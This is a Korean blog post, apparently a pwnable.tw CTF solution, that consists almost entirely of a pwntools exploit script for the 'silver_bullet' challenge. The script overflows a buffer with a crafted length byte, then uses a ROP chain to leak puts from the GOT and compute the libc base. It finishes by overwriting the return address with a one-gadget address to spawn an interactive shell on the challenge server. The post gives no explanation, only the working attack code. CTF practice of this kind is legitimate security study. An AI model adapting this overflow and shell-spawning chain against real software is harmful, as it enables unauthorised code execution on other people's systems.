티스토리 뷰
from pwn import *
s = remote("chall.pwnable.tw", 10103)
e = ELF("./silver_bullet")
libc = ELF("./libc_32.so.6")
context.log_level = 'debug'
pr = 0x08048475
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("A"*47)
s.recvuntil("choice :")
s.sendline("2")
s.recvuntil(":")
s.send("a")
s.recvuntil("choice :")
s.sendline("2")
s.recvuntil(":")
payload = "\xff\xff\xff\xff\xff\xff\xff"
payload += p32(e.plt['puts'])
payload += p32(pr)
payload += p32(e.got['puts'])
payload += p32(0x08048954)
s.sendline(payload)
s.recvuntil("choice :")
s.sendline("3")
s.recvuntil("!!\n")
libc_leak=u32(s.recv(4))
log.success(hex(libc_leak))
base = libc_leak - libc.symbols['puts']
log.success(hex(base))
magic = base + 0x3a819
log.success(hex(magic))
#######
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("A"*47)
s.recvuntil("choice :")
s.sendline("2")
s.recvuntil(":")
s.send("a")
s.recvuntil("choice :")
s.sendline("2")
s.recvuntil(":")
payload = '\xff'*7
payload += p32(magic)
s.sendline(payload)
s.recvuntil("choice :")
s.sendline("3")
s.interactive()'pwnable > pwnable.tw' 카테고리의 다른 글
| [pwnpwnpwn-5] pwnable.tw tcache_tear (0) | 2020.01.12 |
|---|---|
| [pwnpwnpwn-1] pwnable.tw seethefile (0) | 2019.12.22 |
| [pwnable.tw] start write-up (0) | 2018.09.29 |
| [pwnable.tw] hacknote write-up (0) | 2018.08.19 |
| [pwnable.tw] orw write-up (0) | 2018.08.19 |
Comments
최근에 올라온 글
최근에 달린 댓글
TAG
- hacking
- 본선가고싶다
- exit
- rt_sigreturn
- FSB
- shellcoding
- stack reusing
- 해킹
- oob
- heap
- tcache
- HackCTF
- ebp change
- glibc
- fsop
- pwable
- pwnable.tw
- codegate
- pwnable
- overflow
- fastbin
- TLS
- fastbindup
- SQLi
- srop
- Total
- Today
- Yesterday